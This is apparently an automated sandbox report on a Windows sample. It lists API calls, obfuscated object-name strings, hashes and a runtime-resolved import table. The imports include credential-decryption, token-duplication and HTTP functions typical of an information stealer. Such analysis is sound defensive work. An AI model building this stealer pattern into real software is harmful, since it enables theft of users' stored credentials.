CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_f6qx4h48), ref: 0040A437
GetLastError.KERNEL32 ref: 0040A43F
CancelWaitableTimer.KERNEL32(00000000), ref: 0040A44A
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_pbzpxiig), ref: 0040A455
SetEvent.KERNEL32(00000000), ref: 0040A45E
ResetEvent.KERNEL32(00000000), ref: 0040A465
LocalFree.KERNEL32(00000000), ref: 0040A546
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000798,00000000), ref: 0040A5CD
OutputDebugStringA.KERNEL32(tvu3egh8o), ref: 0040A5DA
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040A5DD
CreateWaitableTimerA.KERNEL32(80000001,regx7zezh7y,00000000,00020019,?), ref: 0040A5F9
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_21gm8brb), ref: 0040A60E
GetLastError.KERNEL32 ref: 0040A614
CancelWaitableTimer.KERNEL32(?), ref: 0040A623
SetEnvironmentVariableA.KERNEL32(pbzzr5wc,v30tm2d8), ref: 0040A635
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_fqkemyr8), ref: 0040A642
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A64D
RegOpenKeyExA.ADVAPI32(80000001,reg8zns2qjh,00000000,00020019,?), ref: 0040A66D
GetLastError.KERNEL32 ref: 0040A675
LocalFree.KERNEL32(?), ref: 0040A68F
LocalFree.KERNEL32(00000000), ref: 0040A69E
LocalFree.KERNEL32(?), ref: 0040A6CB
LocalFree.KERNEL32(?), ref: 0040A6D5
LocalFree.KERNEL32(?), ref: 0040A6DF
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_i1maa28u), ref: 0040A716
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A720

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

RegOpenKeyExA.ADVAPI32(80000001,reg2w5gfbud,00000000,00020019,?), ref: 0040A746
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLmzyb9zn8), ref: 0040A755
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A75F
LocalAlloc.KERNEL32(00000000,000004AC), ref: 0040A76B
LocalFree.KERNEL32(00000000), ref: 0040A772
FindFirstFileA.KERNEL32(s_tfgtj6rz,?), ref: 0040A785
FindClose.KERNEL32(00000000), ref: 0040A78C
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000C33,00000000), ref: 0040A79E
CloseHandle.KERNEL32(00000000), ref: 0040A7A5
SetEnvironmentVariableA.KERNEL32(t5lc3xp7,niw9gxm6), ref: 0040A7B5
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_w7d4e7br), ref: 0040A7BF
CancelWaitableTimer.KERNEL32(00000000), ref: 0040A7C2
GetLastError.KERNEL32 ref: 0040A7C8
SetEnvironmentVariableA.KERNEL32(khhzyesc,jl4t9b96), ref: 0040A7DB
CreateWaitableTimerA.KERNEL32(00000001,00000001,WTMR_cd3vbeik), ref: 0040A7EA
CancelWaitableTimer.KERNEL32(00000000), ref: 0040A7F7
OutputDebugStringA.KERNEL32(tz5axcx62), ref: 0040A804
ExitProcess.KERNEL32 ref: 0040A838
ExitProcess.KERNEL32 ref: 0040A874

Strings

SMPHR_2eq14qd1, xrefs: 00409CFF
regxdm8zho5, xrefs: 00409E8F
tcgrgqimv, xrefs: 0040A2FA
SMPHR_sppgcywv, xrefs: 0040A3E6
WTMR_w7d4e7br, xrefs: 0040A7B7
tamx0g12y, xrefs: 00409D1F
lsdlhn77, xrefs: 00409DCF
, xrefs: 0040A05A
lgunryec, xrefs: 0040AE1C
9as963us, xrefs: 00409FA0
s_si61chqu, xrefs: 0040A346
XML71cmvfhb, xrefs: 0040A206
SMPHR_6lpzdlwo, xrefs: 00409D6D
txa3akxyw, xrefs: 0040A3F3
f5p68xvg, xrefs: 00409D66
tlvo7moy8, xrefs: 00409EF7
tdsc9rk0q, xrefs: 0040A2DF
s264ue31, xrefs: 0040AC00
WTMR_tr76xwe3, xrefs: 00409D4B
WTMR_obehzf3u, xrefs: 0040A0F2
WTMR_hs0dk2a5, xrefs: 0040AA61
WTMR_vxf9syn6, xrefs: 00409DE0
d7sl3m43, xrefs: 0040ACE7
MTXdhtqvkw3, xrefs: 0040A196
, xrefs: 0040A165
WTMR_t9m6egtl, xrefs: 00409B41
xzk43o9r, xrefs: 00409B9A
5d227bfk, xrefs: 0040A1EB
regihm21o6p, xrefs: 00409F2F
XML5fi0z4wo, xrefs: 0040A985
g85kbixa, xrefs: 0040A320
tw0xu14w8, xrefs: 00409B06
regd2rr3a8q, xrefs: 0040AC36
z1t84hi9, xrefs: 0040ABC4
MTXs7yc2cpf, xrefs: 00409E1E
1yqp8rgm, xrefs: 00409CF8
reg8zns2qjh, xrefs: 0040A663
reg4dqscw5e, xrefs: 0040AC95
tf9fnyzeu, xrefs: 00409C42
WTMR_a48a899t, xrefs: 0040A35E
ev_hdsn5yos, xrefs: 0040ADE7
MTXz3u02dvk, xrefs: 0040ACC4
llliohkc, xrefs: 00409D61
XMLb8uaoddh, xrefs: 00409B0D
WTMR_89mr44nv, xrefs: 0040AC17
ge955tme, xrefs: 00409B9F
s_tfgtj6rz, xrefs: 0040A780
reguwfk0hla, xrefs: 0040AB64
4u0yaheq, xrefs: 0040ABC9
su1oex00, xrefs: 0040AAF1
ev_ky9wrxpo, xrefs: 0040ACA5
WTMR_dyzpca0g, xrefs: 00409BDC
WTMR_x8gpb0lb, xrefs: 0040AED8
q3etk14f, xrefs: 0040A09F
regvftu6lz0, xrefs: 0040A14E
XMLz5rmbhid, xrefs: 0040AB0C
ohdt31xv, xrefs: 0040A388
stbpwo2y, xrefs: 0040A9EF
j9t3a45b, xrefs: 0040A1F0
reg130n27js, xrefs: 0040A41F
MTXxjk5ahv4, xrefs: 0040AE81
XML0vfjvhca, xrefs: 00409FCE
s_2ubk6zki, xrefs: 00409DA0
XMLjlel85wp, xrefs: 00409BBB
pbzzr5wc, xrefs: 0040A630
5jmcc7u5, xrefs: 0040ACEC
WTMR_7fjgma4m, xrefs: 0040AE08
ty1p0rbxh, xrefs: 00409C81
161wgn8y, xrefs: 00409EB6
regx7zezh7y, xrefs: 0040A5EF
XMLf3sp4yo9, xrefs: 00409CD7
MTX4z00y3dg, xrefs: 0040A126
tdrs9xk82, xrefs: 0040AAC3
tv8nwi2ye, xrefs: 00409C6B
regtg6hgy4i, xrefs: 0040A254
t4xm2me3a, xrefs: 0040A376
5nvulrot, xrefs: 0040AEB2
ft98khpd, xrefs: 00409CB8
WTMR_vyhzltt5, xrefs: 00409D26
WTMR_f6qx4h48, xrefs: 0040A42F
ev_bvwkjxju, xrefs: 0040A9BA
tvu3egh8o, xrefs: 0040A5D3
regl9ou77sk, xrefs: 00409BF8
002oxa6s, xrefs: 00409DD4
WTMR_p0n3nl7z, xrefs: 00409FE6
b4z1gplo, xrefs: 0040A9EA
regln1bdbu9, xrefs: 0040A040
tmpq5eank, xrefs: 0040ABD2
regtdxb12x8, xrefs: 0040AA14
WTMR_90d3uvs3, xrefs: 00409F7E
tcbeioeps, xrefs: 0040A0AD
XML3n3278d8, xrefs: 0040A3A5
WTMR_adwimds2, xrefs: 00409B2C
c5wa0nkd, xrefs: 00409F5D
ku9syi5h, xrefs: 00409F62
WTMR_v69s0jur, xrefs: 00409C08
WTMR_cd3vbeik, xrefs: 0040A7E2
xs5vk1s3, xrefs: 00409B58
SMPHR_uwv8pkbg, xrefs: 0040A9D9
5ce5ttlh, xrefs: 0040AEB7
ev_69lhuihm, xrefs: 0040A2A0
WTMR_pto6pfv2, xrefs: 0040A37D
WTMR_nxosby4a, xrefs: 0040ABF1
WTMR_oub7h52a, xrefs: 0040A1E0
51v3k8q2, xrefs: 0040A38D
hv8euc46, xrefs: 0040AA55
th165yn1l, xrefs: 0040ACD9
azsmnf7g, xrefs: 0040AA8F
MTXqamhcxjd, xrefs: 0040AAA7
SMPHR_ryx02sq6, xrefs: 00409B66
s_ww785inq, xrefs: 0040AC59
qjqhz0u1, xrefs: 00409CF3
s_sny9se1j, xrefs: 0040A9A8
khhzyesc, xrefs: 0040A7D6
3ea1jj2a, xrefs: 0040A0A4
t5lc3xp7, xrefs: 0040A7B0
s_prfrvct4, xrefs: 0040A071
omc9fsdv, xrefs: 00409CBD
ev_mo34bm41, xrefs: 00409E48
tqeqy21fj, xrefs: 0040A052
7gl86t31, xrefs: 0040A31B
d4cmirb6, xrefs: 00409BB4
regne7jg826, xrefs: 0040A735
, xrefs: 0040A296
ev_pbzpxiig, xrefs: 0040A44C
teqpwudeb, xrefs: 0040A18F
XMLsuug0zye, xrefs: 0040AE65
t67h61xmt, xrefs: 00409D8D
un3l2zxs, xrefs: 0040AE17
WTMR_21gm8brb, xrefs: 0040A605
SMPHR_vpy2bwwa, xrefs: 0040AC6B
SMPHR_y57u78i2, xrefs: 0040A018
SMPHR_uop44cey, xrefs: 0040A083
9kcjkxl4, xrefs: 00409E38
braglban, xrefs: 0040A230
, xrefs: 0040A3BE
WTMR_2txq3mdt, xrefs: 00409C77
regaq0b5t8d, xrefs: 0040A1D0
s_a0toa3p9, xrefs: 0040AEC6
p44tx6zp, xrefs: 00409F77
6g69ivna, xrefs: 0040AA5A
mokchxe1, xrefs: 0040AC05
SMPHR_2hyvdvo7, xrefs: 0040ABA8
tygxt7169, xrefs: 00409C49
SMPHR_i1maa28u, xrefs: 0040A70B
SMPHR_g6taiqrz, xrefs: 0040A30A
tiwnylch0, xrefs: 0040A104
xdjt50gy, xrefs: 0040AAF6
regpf00k4ni, xrefs: 0040A008
XMLxkunipu6, xrefs: 0040A0B4
t1llz488k, xrefs: 0040AEA9
27tkawec, xrefs: 00409F9B
ttllcje41, xrefs: 0040AE98
MTXpzc2har6, xrefs: 00409CA1
f35cv2jv, xrefs: 00409EC6
reguqgyqj10, xrefs: 0040AB30
XMLk2begpxq, xrefs: 0040A3C8
SMPHR_fqkemyr8, xrefs: 0040A637
s_gt9kio2q, xrefs: 0040AB96
e0qagkaq, xrefs: 00409ECB
WTMR_sj1xw7ld, xrefs: 00409EEC
d1fc95c6179be4b0b4f93eff6ab3f08f, xrefs: 00409D41
reg2w5gfbud, xrefs: 0040A73C
WTMR_cjcjokyw, xrefs: 00409F11
XMLmzyb9zn8, xrefs: 0040A74C
WTMR_v5k45pxa, xrefs: 0040AAD0
SMPHR_e2jplyy5, xrefs: 00409C25
kb6fjaib, xrefs: 0040A22B
toy33ol74, xrefs: 0040A2CF
niw9gxm6, xrefs: 0040A7AB
v30tm2d8, xrefs: 0040A62B
tjetkpjp5, xrefs: 00409D94
WTMR_yr4guqvv, xrefs: 0040AAE6
eazbdckw, xrefs: 00409F72
ev_4y0ori58, xrefs: 0040A0CD
WTMR_mj0fpgou, xrefs: 0040A285
MTXapeqgoy0, xrefs: 0040AA24
ev_gl9rlb32, xrefs: 0040A264
tp32whtjp, xrefs: 00409CD0
bogln9j8, xrefs: 0040AA8A
p1bpvb3k, xrefs: 00409EB1
f1tx9ijh, xrefs: 00409BAF
jl4t9b96, xrefs: 0040A7D1
yiiah0mu, xrefs: 00409B53
SMPHR_vlpohx8g, xrefs: 0040A21E
tz5axcx62, xrefs: 0040A7FF
uy3n4usz, xrefs: 00409E3D
regppkzko0j, xrefs: 0040AE55
XMLnusjnsj4, xrefs: 00409E69

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$SemaphoreTimerWaitable$Release$Local$EnvironmentEventVariable$CancelDebugOutputString$ErrorFindLast$Free$Open$CloseFileMutex$Alloc$Mapping$Reset$ChangeNotification$First$ExitProcesslstrlen$Handle$Initialize
String ID: $ $ $ $002oxa6s$161wgn8y$1yqp8rgm$27tkawec$3ea1jj2a$4u0yaheq$51v3k8q2$5ce5ttlh$5d227bfk$5jmcc7u5$5nvulrot$6g69ivna$7gl86t31$9as963us$9kcjkxl4$MTX4z00y3dg$MTXapeqgoy0$MTXdhtqvkw3$MTXpzc2har6$MTXqamhcxjd$MTXs7yc2cpf$MTXxjk5ahv4$MTXz3u02dvk$SMPHR_2eq14qd1$SMPHR_2hyvdvo7$SMPHR_6lpzdlwo$SMPHR_e2jplyy5$SMPHR_fqkemyr8$SMPHR_g6taiqrz$SMPHR_i1maa28u$SMPHR_ryx02sq6$SMPHR_sppgcywv$SMPHR_uop44cey$SMPHR_uwv8pkbg$SMPHR_vlpohx8g$SMPHR_vpy2bwwa$SMPHR_y57u78i2$WTMR_21gm8brb$WTMR_2txq3mdt$WTMR_7fjgma4m$WTMR_89mr44nv$WTMR_90d3uvs3$WTMR_a48a899t$WTMR_adwimds2$WTMR_cd3vbeik$WTMR_cjcjokyw$WTMR_dyzpca0g$WTMR_f6qx4h48$WTMR_hs0dk2a5$WTMR_mj0fpgou$WTMR_nxosby4a$WTMR_obehzf3u$WTMR_oub7h52a$WTMR_p0n3nl7z$WTMR_pto6pfv2$WTMR_sj1xw7ld$WTMR_t9m6egtl$WTMR_tr76xwe3$WTMR_v5k45pxa$WTMR_v69s0jur$WTMR_vxf9syn6$WTMR_vyhzltt5$WTMR_w7d4e7br$WTMR_x8gpb0lb$WTMR_yr4guqvv$XML0vfjvhca$XML3n3278d8$XML5fi0z4wo$XML71cmvfhb$XMLb8uaoddh$XMLf3sp4yo9$XMLjlel85wp$XMLk2begpxq$XMLmzyb9zn8$XMLnusjnsj4$XMLsuug0zye$XMLxkunipu6$XMLz5rmbhid$azsmnf7g$b4z1gplo$bogln9j8$braglban$c5wa0nkd$d1fc95c6179be4b0b4f93eff6ab3f08f$d4cmirb6$d7sl3m43$e0qagkaq$eazbdckw$ev_4y0ori58$ev_69lhuihm$ev_bvwkjxju$ev_gl9rlb32$ev_hdsn5yos$ev_ky9wrxpo$ev_mo34bm41$ev_pbzpxiig$f1tx9ijh$f35cv2jv$f5p68xvg$ft98khpd$g85kbixa$ge955tme$hv8euc46$j9t3a45b$jl4t9b96$kb6fjaib$khhzyesc$ku9syi5h$lgunryec$llliohkc$lsdlhn77$mokchxe1$niw9gxm6$ohdt31xv$omc9fsdv$p1bpvb3k$p44tx6zp$pbzzr5wc$q3etk14f$qjqhz0u1$reg130n27js$reg2w5gfbud$reg4dqscw5e$reg8zns2qjh$regaq0b5t8d$regd2rr3a8q$regihm21o6p$regl9ou77sk$regln1bdbu9$regne7jg826$regpf00k4ni$regppkzko0j$regtdxb12x8$regtg6hgy4i$reguqgyqj10$reguwfk0hla$regvftu6lz0$regx7zezh7y$regxdm8zho5$s264ue31$s_2ubk6zki$s_a0toa3p9$s_gt9kio2q$s_prfrvct4$s_si61chqu$s_sny9se1j$s_tfgtj6rz$s_ww785inq$stbpwo2y$su1oex00$t1llz488k$t4xm2me3a$t5lc3xp7$t67h61xmt$tamx0g12y$tcbeioeps$tcgrgqimv$tdrs9xk82$tdsc9rk0q$teqpwudeb$tf9fnyzeu$th165yn1l$tiwnylch0$tjetkpjp5$tlvo7moy8$tmpq5eank$toy33ol74$tp32whtjp$tqeqy21fj$ttllcje41$tv8nwi2ye$tvu3egh8o$tw0xu14w8$txa3akxyw$ty1p0rbxh$tygxt7169$tz5axcx62$un3l2zxs$uy3n4usz$v30tm2d8$xdjt50gy$xs5vk1s3$xzk43o9r$yiiah0mu$z1t84hi9
API String ID: 53752110-2096709581
Opcode ID: 781759c007ea8460e48c24abde59f4871cd502e2253a5cbf120219d13f5110a3
Instruction ID: e77971dfa8cd59fb02b6948e947a628a10bf7698073f448a95d7aa0260a18d40
Opcode Fuzzy Hash: 781759c007ea8460e48c24abde59f4871cd502e2253a5cbf120219d13f5110a3
Instruction Fuzzy Hash: 8DB27871A44350BBD7106FB0DD4AFDE3FA8AB4CB46F104426F705E65E1CAB899808B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 392.5, APIs: 112, Strings: 112, Instructions: 451
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,771A9350,771A7CD0,?,?,?,00409C55), ref: 00401012
GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102F
GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 0040103C
GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00401044
GetProcAddress.KERNEL32(00000000,lstrlenA), ref: 00401051
GetProcAddress.KERNEL32(00000000,FreeLibrary), ref: 0040105E
GetProcAddress.KERNEL32(00000000,GlobalFree), ref: 0040106B
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401078
GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00401085
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00401092
GetProcAddress.KERNEL32(00000000,lstrcpyA), ref: 0040109F
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004010AC
GetProcAddress.KERNEL32(00000000,lstrlenW), ref: 004010B9
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 004010C6
GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 004010D3
GetProcAddress.KERNEL32(00000000,lstrcmpW), ref: 004010E0
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004010ED
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004010FA
GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00401107
GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00401114
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00401121
GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 0040112E
GetProcAddress.KERNEL32(00000000,OpenMutexW), ref: 0040113B
GetProcAddress.KERNEL32(00000000,WideCharToMultiByte), ref: 00401148
GetProcAddress.KERNEL32(00000000,GlobalAlloc), ref: 00401155
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 00401162

Strings

HttpQueryInfoW, xrefs: 004013DE
Shlwapi.dll, xrefs: 004012C6
FreeLibrary, xrefs: 00401053
StrToInt64ExW, xrefs: 0040133A
StrStrIW, xrefs: 004012E9
Ole32.dll, xrefs: 00401347
SystemFunction036, xrefs: 0040149F
GetProcAddress, xrefs: 00401087
ShellExecuteW, xrefs: 00401463
MultiByteToWideChar, xrefs: 00401256
StrStrA, xrefs: 0040132D
SHGetSpecialFolderPathW, xrefs: 00401478
CoCreateInstance, xrefs: 00401358
GlobalFree, xrefs: 00401060
GetTokenInformation, xrefs: 004014FA
WideCharToMultiByte, xrefs: 0040113D
ReadFile, xrefs: 004010A1
FindNextFileW, xrefs: 004010FC
LoadLibraryW, xrefs: 00401029
InternetCloseHandle, xrefs: 004013EF
lstrcpyA, xrefs: 00401094
GetSystemInfo, xrefs: 0040121A
SetCurrentDirectoryW, xrefs: 004010C8
Process32Next, xrefs: 0040122F
User32.dll, xrefs: 0040137D
OpenMutexW, xrefs: 00401130
CreateProcessWithTokenW, xrefs: 00401507
CloseHandle, xrefs: 004010E2
StrRChrW, xrefs: 0040130B
PathCombineW, xrefs: 004012FE
StrToIntA, xrefs: 00401318
GetTimeZoneInformation, xrefs: 0040107A
Process32NextW, xrefs: 004012B9
CopyFileW, xrefs: 004011E6
LocalFree, xrefs: 00401222
GetSystemMetrics, xrefs: 00401553
LocalAlloc, xrefs: 004011BF
CreateToolhelp32Snapshot, xrefs: 00401270
Advapi32.dll, xrefs: 00401384
GetUserDefaultLocaleName, xrefs: 00401031
ConvertSidToStringSidW, xrefs: 00401485
FindClose, xrefs: 00401263
FindFirstFileW, xrefs: 00401109
ReleaseDC, xrefs: 00401565
GetLogicalDriveStringsW, xrefs: 00401292
Shell32.dll, xrefs: 0040136C
lstrcmpA, xrefs: 00401200
DeleteFileW, xrefs: 0040123C
PathMatchSpecW, xrefs: 004012D4
OpenProcess, xrefs: 004011B2
StrCpyW, xrefs: 004012DC
CryptStringToBinaryA, xrefs: 0040157D
CryptUnprotectData, xrefs: 004015A4
EnumDisplayDevicesW, xrefs: 00401524
RegQueryValueExW, xrefs: 004014ED
InternetReadFile, xrefs: 0040143F
lstrlenA, xrefs: 00401046
CoInitialize, xrefs: 00401350
InternetSetOptionW, xrefs: 0040140C
WinInet.dll, xrefs: 00401360
InternetConnectW, xrefs: 004013FB
RegCloseKey, xrefs: 004014B9
kernel32.dll, xrefs: 0040100D
TerminateProcess, xrefs: 0040129F
RegOpenKeyExW, xrefs: 004014E0
ExitProcess, xrefs: 00401164
Process32FirstW, xrefs: 004012AC
InternetOpenUrlA, xrefs: 00401450
GetLastError, xrefs: 004010EF
HttpSendRequestW, xrefs: 0040142E
OpenProcessToken, xrefs: 00401492
GetDC, xrefs: 00401539
GetCurrentProcess, xrefs: 00401157
SHGetFolderPathW, xrefs: 0040146B
CreateMutexW, xrefs: 00401171
RegEnumKeyExW, xrefs: 004014AC
Sleep, xrefs: 0040120D
lstrlenW, xrefs: 004010AE
HttpQueryInfoA, xrefs: 004013A6
SetEnvironmentVariableW, xrefs: 004011D9
GlobalMemoryStatusEx, xrefs: 00401198
InternetReadFileExW, xrefs: 004013C1
lstrcpynA, xrefs: 00401249
GetFileSize, xrefs: 00401128
StrStrW, xrefs: 004012F6
DuplicateTokenEx, xrefs: 004014C6
HttpOpenRequestW, xrefs: 004013B5
GetUserNameW, xrefs: 004014D3
WriteFile, xrefs: 004010BB
GetSystemWow64DirectoryW, xrefs: 0040117E
GetLocaleInfoW, xrefs: 0040118B
GlobalAlloc, xrefs: 0040114A
InternetOpenUrlW, xrefs: 004013D2
GetUserDefaultLCID, xrefs: 0040128A
InternetOpenW, xrefs: 0040141D
HeapFree, xrefs: 0040127D
lstrcmpiW, xrefs: 004011CC
Process32First, xrefs: 00401116
GetClientRect, xrefs: 0040152C
GetEnvironmentVariableW, xrefs: 0040103E
Bcrypt.dll, xrefs: 0040138E
CharUpperW, xrefs: 00401517
CryptBinaryToStringW, xrefs: 00401597
GetDesktopWindow, xrefs: 00401546
CryptStringToBinaryW, xrefs: 0040158A
Crypt32.dll, xrefs: 0040139B
CreateFileW, xrefs: 0040106D
lstrcmpW, xrefs: 004010D5
GetDriveTypeW, xrefs: 004011A5
GetModuleFileNameW, xrefs: 004011F3
StrToIntW, xrefs: 00401325
wsprintfW, xrefs: 0040156D

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: Advapi32.dll$Bcrypt.dll$CharUpperW$CloseHandle$CoCreateInstance$CoInitialize$ConvertSidToStringSidW$CopyFileW$CreateFileW$CreateMutexW$CreateProcessWithTokenW$CreateToolhelp32Snapshot$Crypt32.dll$CryptBinaryToStringW$CryptStringToBinaryA$CryptStringToBinaryW$CryptUnprotectData$DeleteFileW$DuplicateTokenEx$EnumDisplayDevicesW$ExitProcess$FindClose$FindFirstFileW$FindNextFileW$FreeLibrary$GetClientRect$GetCurrentProcess$GetDC$GetDesktopWindow$GetDriveTypeW$GetEnvironmentVariableW$GetFileSize$GetLastError$GetLocaleInfoW$GetLogicalDriveStringsW$GetModuleFileNameW$GetProcAddress$GetSystemInfo$GetSystemMetrics$GetSystemWow64DirectoryW$GetTimeZoneInformation$GetTokenInformation$GetUserDefaultLCID$GetUserDefaultLocaleName$GetUserNameW$GlobalAlloc$GlobalFree$GlobalMemoryStatusEx$HeapFree$HttpOpenRequestW$HttpQueryInfoA$HttpQueryInfoW$HttpSendRequestW$InternetCloseHandle$InternetConnectW$InternetOpenUrlA$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExW$InternetSetOptionW$LoadLibraryW$LocalAlloc$LocalFree$MultiByteToWideChar$Ole32.dll$OpenMutexW$OpenProcess$OpenProcessToken$PathCombineW$PathMatchSpecW$Process32First$Process32FirstW$Process32Next$Process32NextW$ReadFile$RegCloseKey$RegEnumKeyExW$RegOpenKeyExW$RegQueryValueExW$ReleaseDC$SHGetFolderPathW$SHGetSpecialFolderPathW$SetCurrentDirectoryW$SetEnvironmentVariableW$Shell32.dll$ShellExecuteW$Shlwapi.dll$Sleep$StrCpyW$StrRChrW$StrStrA$StrStrIW$StrStrW$StrToInt64ExW$StrToIntA$StrToIntW$SystemFunction036$TerminateProcess$User32.dll$WideCharToMultiByte$WinInet.dll$WriteFile$kernel32.dll$lstrcmpA$lstrcmpW$lstrcmpiW$lstrcpyA$lstrcpynA$lstrlenA$lstrlenW$wsprintfW
API String ID: 2238633743-1109507645
Opcode ID: b080fed737f4aee8b3a7a30e91387e2ec329667af4fa8eb9765b117f2ab5de35
Instruction ID: 10b7ca4a53547034c89637a339416f9ad75de324a14711a5cd4a76be5222908f
Opcode Fuzzy Hash: b080fed737f4aee8b3a7a30e91387e2ec329667af4fa8eb9765b117f2ab5de35
Instruction Fuzzy Hash: 6ED1C074D91754FE97006FB5AC89FDA7EE8ED4DB943208527B204E3170D6BC89808BAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040E48D Relevance: 177.1, APIs: 63, Strings: 38, Instructions: 302
timeregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ncjvn580), ref: 0040E4AD
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E4B3
RegOpenKeyExA.ADVAPI32(80000001,regurxbk0z1,00000000,00020019,0040A700), ref: 0040E4DA
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML5zofh5uh), ref: 0040E4EB
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E4F3
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_auaalwdo), ref: 0040E502
SetEvent.KERNEL32(00000000), ref: 0040E50B
ResetEvent.KERNEL32(00000000), ref: 0040E512
LocalAlloc.KERNEL32(00000000,00000D8E), ref: 0040E51F
LocalFree.KERNEL32(00000000), ref: 0040E526
GetLastError.KERNEL32 ref: 0040E52C
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_3wmy1555), ref: 0040E53B
GetLastError.KERNEL32 ref: 0040E543
CancelWaitableTimer.KERNEL32(00000000), ref: 0040E54A
OutputDebugStringA.KERNEL32(t4z65gxg3), ref: 0040E555
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_9k3bwwuv), ref: 0040E565
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLabwc5xbh), ref: 0040E585
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E58F
RegOpenKeyExA.ADVAPI32(80000001,reg4fypal5k,00000000,00020019,?), ref: 0040E5A1
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_d1n9xjo7), ref: 0040E5B0
SetEvent.KERNEL32(00000000), ref: 0040E5B9
ResetEvent.KERNEL32(00000000), ref: 0040E5C0
